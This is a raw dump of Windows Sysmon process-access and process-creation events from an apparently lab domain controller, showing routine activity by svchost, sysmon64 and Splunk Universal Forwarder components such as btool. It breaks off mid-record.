13:09:44.634{08A6967A-4286-6000-0A00-000000009A01}844936C:\Windows\system32\services.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429B-6000-5300-000000009A01}2576C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5300-000000009A01}2576C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-429B-6000-5C00-000000009A01}33722964C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-429B-6000-5300-000000009A01}2576C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.971{08A6967A-429B-6000-5D00-000000009A01}2576C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-429B-6000-5C00-000000009A01}3372C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000002154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429B-6000-5C00-000000009A01}3372C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5C00-000000009A01}3372C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.962{08A6967A-429A-6000-4F00-000000009A01}38802220C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-429B-6000-5C00-000000009A01}3372C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.964{08A6967A-429B-6000-5C00-000000009A01}3372C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.915{08A6967A-429B-6000-5B00-000000009A01}38323844C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program 